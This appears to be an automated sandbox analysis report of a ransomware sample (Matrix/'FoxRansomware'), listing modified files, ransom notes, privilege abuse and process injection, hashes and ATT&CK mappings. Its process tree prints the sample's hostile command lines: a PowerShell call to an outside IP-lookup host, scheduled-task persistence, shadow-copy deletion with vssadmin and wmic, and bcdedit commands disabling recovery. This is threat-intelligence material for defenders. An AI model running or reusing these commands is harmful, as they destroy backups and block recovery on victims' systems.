C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\file_icons.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedgewebview2.exe.sig 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProDemoR_BypassTrial180-ppd.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-ul-oob.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-100.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BRADHITC.TTF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART12.BDR 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-ppd.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-pl.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN081.XML 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\TAG.XSL 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ppd.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-pl.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\THMBNAIL.PNG 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ppd.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7EN.LEX 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-oob.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4016 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3956 vssadmin.exe 6464 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4900 powershell.exe 4900 powershell.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6252 j3MxuEwf64.exe 6884 powershell.exe 6884 powershell.exe 6884 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 6252 j3MxuEwf64.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 4900 powershell.exe Token: SeTakeOwnershipPrivilege 6824 takeown.exe Token: SeDebugPrivilege 6252 j3MxuEwf64.exe Token: SeLoadDriverPrivilege 6252 j3MxuEwf64.exe Token: SeBackupPrivilege 6544 vssvc.exe Token: SeRestorePrivilege 6544 vssvc.exe Token: SeAuditPrivilege 6544 vssvc.exe Token: SeIncreaseQuotaPrivilege 5360 WMIC.exe Token: SeSecurityPrivilege 5360 WMIC.exe Token: SeTakeOwnershipPrivilege 5360 WMIC.exe Token: SeLoadDriverPrivilege 5360 WMIC.exe Token: SeSystemProfilePrivilege 5360 WMIC.exe Token: SeSystemtimePrivilege 5360 WMIC.exe Token: SeProfSingleProcessPrivilege 5360 WMIC.exe Token: SeIncBasePriorityPrivilege 5360 WMIC.exe Token: SeCreatePagefilePrivilege 5360 WMIC.exe Token: SeBackupPrivilege 5360 WMIC.exe Token: SeRestorePrivilege 5360 WMIC.exe Token: SeShutdownPrivilege 5360 WMIC.exe Token: SeDebugPrivilege 5360 WMIC.exe Token: SeSystemEnvironmentPrivilege 5360 WMIC.exe Token: SeRemoteShutdownPrivilege 5360 WMIC.exe Token: SeUndockPrivilege 5360 WMIC.exe Token: SeManageVolumePrivilege 5360 WMIC.exe Token: 33 5360 WMIC.exe Token: 34 5360 WMIC.exe Token: 35 5360 WMIC.exe Token: 36 5360 WMIC.exe Token: SeIncreaseQuotaPrivilege 5360 WMIC.exe Token: SeSecurityPrivilege 5360 WMIC.exe Token: SeTakeOwnershipPrivilege 5360 WMIC.exe Token: SeLoadDriverPrivilege 5360 WMIC.exe Token: SeSystemProfilePrivilege 5360 WMIC.exe Token: SeSystemtimePrivilege 5360 WMIC.exe Token: SeProfSingleProcessPrivilege 5360 WMIC.exe Token: SeIncBasePriorityPrivilege 5360 WMIC.exe Token: SeCreatePagefilePrivilege 5360 WMIC.exe Token: SeBackupPrivilege 5360 WMIC.exe Token: SeRestorePrivilege 5360 WMIC.exe Token: SeShutdownPrivilege 5360 WMIC.exe Token: SeDebugPrivilege 5360 WMIC.exe Token: SeSystemEnvironmentPrivilege 5360 WMIC.exe Token: SeRemoteShutdownPrivilege 5360 WMIC.exe Token: SeUndockPrivilege 5360 WMIC.exe Token: SeManageVolumePrivilege 5360 WMIC.exe Token: 33 5360 WMIC.exe Token: 34 5360 WMIC.exe Token: 35 5360 WMIC.exe Token: 36 5360 WMIC.exe Token: SeDebugPrivilege 6884 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2764 wrote to memory of 1524 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 86 PID 2764 wrote to memory of 1524 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 86 PID 2764 wrote to memory of 1524 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 86 PID 2764 wrote to memory of 1828 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 88 PID 2764 wrote to memory of 1828 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 88 PID 2764 wrote to memory of 1828 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 88 PID 2764 wrote to memory of 1304 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 90 PID 2764 wrote to memory of 1304 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 90 PID 2764 wrote to memory of 1304 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 90 PID 1304 wrote to memory of 4900 1304 cmd.exe 92 PID 1304 wrote to memory of 4900 1304 cmd.exe 92 PID 1304 wrote to memory of 4900 1304 cmd.exe 92 PID 2764 wrote to memory of 1968 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 98 PID 2764 wrote to memory of 1968 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 98 PID 2764 wrote to memory of 1968 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 98 PID 2764 wrote to memory of 8 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 97 PID 2764 wrote to memory of 8 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 97 PID 2764 wrote to memory of 8 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 97 PID 2764 wrote to memory of 5768 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 99 PID 2764 wrote to memory of 5768 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 99 PID 2764 wrote to memory of 5768 2764 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 99 PID 8 wrote to memory of 7128 8 cmd.exe 101 PID 8 wrote to memory of 7128 8 cmd.exe 101 PID 8 wrote to memory of 7128 8 cmd.exe 101 PID 1968 wrote to memory of 2088 1968 cmd.exe 103 PID 1968 wrote to memory of 2088 1968 cmd.exe 103 PID 1968 wrote to memory of 2088 1968 cmd.exe 103 PID 1968 wrote to memory of 2896 1968 cmd.exe 105 PID 1968 wrote to memory of 2896 1968 cmd.exe 105 PID 1968 wrote to memory of 2896 1968 cmd.exe 105 PID 5768 wrote to memory of 1784 5768 cmd.exe 108 PID 5768 wrote to memory of 1784 5768 cmd.exe 108 PID 5768 wrote to memory of 1784 5768 cmd.exe 108 PID 7128 wrote to memory of 4292 7128 wscript.exe 106 PID 7128 wrote to memory of 4292 7128 wscript.exe 106 PID 7128 wrote to memory of 4292 7128 wscript.exe 106 PID 1968 wrote to memory of 4232 1968 cmd.exe 109 PID 1968 wrote to memory of 4232 1968 cmd.exe 109 PID 1968 wrote to memory of 4232 1968 cmd.exe 109 PID 4292 wrote to memory of 4016 4292 cmd.exe 111 PID 4292 wrote to memory of 4016 4292 cmd.exe 111 PID 4292 wrote to memory of 4016 4292 cmd.exe 111 PID 5768 wrote to memory of 4020 5768 cmd.exe 112 PID 5768 wrote to memory of 4020 5768 cmd.exe 112 PID 5768 wrote to memory of 4020 5768 cmd.exe 112 PID 5768 wrote to memory of 6824 5768 cmd.exe 113 PID 5768 wrote to memory of 6824 5768 cmd.exe 113 PID 5768 wrote to memory of 6824 5768 cmd.exe 113 PID 5768 wrote to memory of 5384 5768 cmd.exe 114 PID 5768 wrote to memory of 5384 5768 cmd.exe 114 PID 5768 wrote to memory of 5384 5768 cmd.exe 114 PID 5384 wrote to memory of 5780 5384 cmd.exe 115 PID 5384 wrote to memory of 5780 5384 cmd.exe 115 PID 5384 wrote to memory of 5780 5384 cmd.exe 115 PID 7128 wrote to memory of 5280 7128 wscript.exe 116 PID 7128 wrote to memory of 5280 7128 wscript.exe 116 PID 7128 wrote to memory of 5280 7128 wscript.exe 116 PID 5780 wrote to memory of 6252 5780 j3MxuEwf.exe 118 PID 5780 wrote to memory of 6252 5780 j3MxuEwf.exe 118 PID 5280 wrote to memory of 7056 5280 cmd.exe 119 PID 5280 wrote to memory of 7056 5280 cmd.exe 119 PID 5280 wrote to memory of 7056 5280 cmd.exe 119 PID 6208 wrote to memory of 3956 6208 cmd.exe 122 PID 6208 wrote to memory of 3956 6208 cmd.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1784 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe"2⤵PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe" -n2⤵
- Executes dropped EXE
PID:1828
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\JBQVODeU.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WS8smXz0.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WS8smXz0.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:7128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\up21cGFf.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\up21cGFf.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:5280 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:7056
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\hQne0weC.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\hQne0weC.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2896
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mRDZlhzx.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:5768 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:1784
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:4020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c j3MxuEwf.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:5384 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\j3MxuEwf.exej3MxuEwf.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\j3MxuEwf64.exej3MxuEwf.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:6252
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\up21cGFf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:6208 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:3956
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6884 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6464
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:6508
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:5468
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:4688
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6544
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CORE_README#.rtf
Filesize8KB
MD5914fcec25f99807c89a5b611d6c3a7cf
SHA14d684135020b7a70530b618d81258da246913149
SHA2568b20cb111ea2734c372d6b6e08006b34a2b3757a698201aba06b882a4d3e1bb2
SHA5123085ec2969f8f9520df9cb6461252e4bd226c6357b5899ff070ab63528e7a2f76c280b19bcef87c3df5d7b929d78c0fd26ba7adab70fba13e6be6f2c2dc639d4
-
Filesize
16KB
MD51052ddf06b008f80d450046b086a8807
SHA10229454304e7ba2431f735eb1f8ff81b71cf56b7
SHA2565ba061eac1cefcf0c52982f58e3f71a7ec6c437676736351b41e6f1065a8f6af
SHA5129f930e1e6560a5d6f4621cf3dd5d6b7e4315c4a45e67175fde78761573456aaf376d91ea3557eb5a9c843f45b84ce2d79946e6623c9ccbd21cf08d7d31d9b244
-
Filesize
14B
MD5c74dacdd9331a6698efffe81ff66ac08
SHA179e8ce4bb5cc2436e95fad4a74a31aee7aa63043
SHA25682ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
SHA51224620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
-
Filesize
1.2MB
MD5907636b28d162f7110b067a8178fa38c
SHA1048ae4691fe267e7c8d9eda5361663593747142a
SHA2566e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
Filesize
10KB
MD5401159f2d991d977447e68bb94392012
SHA1965f0f99942defe070a891f28c14770456c0daa6
SHA256acae4a3af173f36cdf1051fa53b7d6946f6649c662706af8075fabede01d8e00
SHA51237f2aa6b66862d889a61a56d6ccb672bb55e825b2104d6b996bdc6afa01fc3061ff05ee4d13484b8b6d222d497a8c436d6fb77432409c56eb4dc32a3411788c3
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
246B
MD5def955437bb2dc6df2b4346a00870ab1
SHA1910db255a9176565c0e05e7522978e9afe08eb09
SHA256980acf75f30a2ce3a89ddfa6477c4d170f2367ebe05a16e96b3150f0f80c4bc5
SHA512decbe95082c0b112194abaa8765fe28639ab5ea01983beee665c0dcbc686949c2266b6b315ed35afd56a84fb006c6d41487196ce673a33582d87bd9b0338fd06
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
260B
MD52b026ff5efe4898e1519582871bd46ea
SHA135b797ba64720a2cd12ed9928c9f443984aa537f
SHA256108a3a749667a0fb80834085d9e8ef6cb631895b0635ab418879a792b88c7cb0
SHA5122a2c87b6260b6591ad1be8a8d3ed9ec49f402ab4211b20e67440a89b315c315e5c9f9823af93028fa2c6553c95e5b41cb7285ba670a9a46f41bf0270efb64fb5
-
Filesize
415B
MD5f3eb1bece5c8267cee9dd890dc426f6c
SHA11b2f74c253047757568ed839dc788cd3d7041611
SHA25680444e0f1551b7098a277546dd473574613ef0bd5490fd825be861c322c61b10
SHA512a37969585b44bf95e313bc685fe9e0bf884a34900d1a7d85adceaae639de5536b416f2e92d7b3659328a5a91f3fca41fc57214ec1829b73ea324797bae53f22d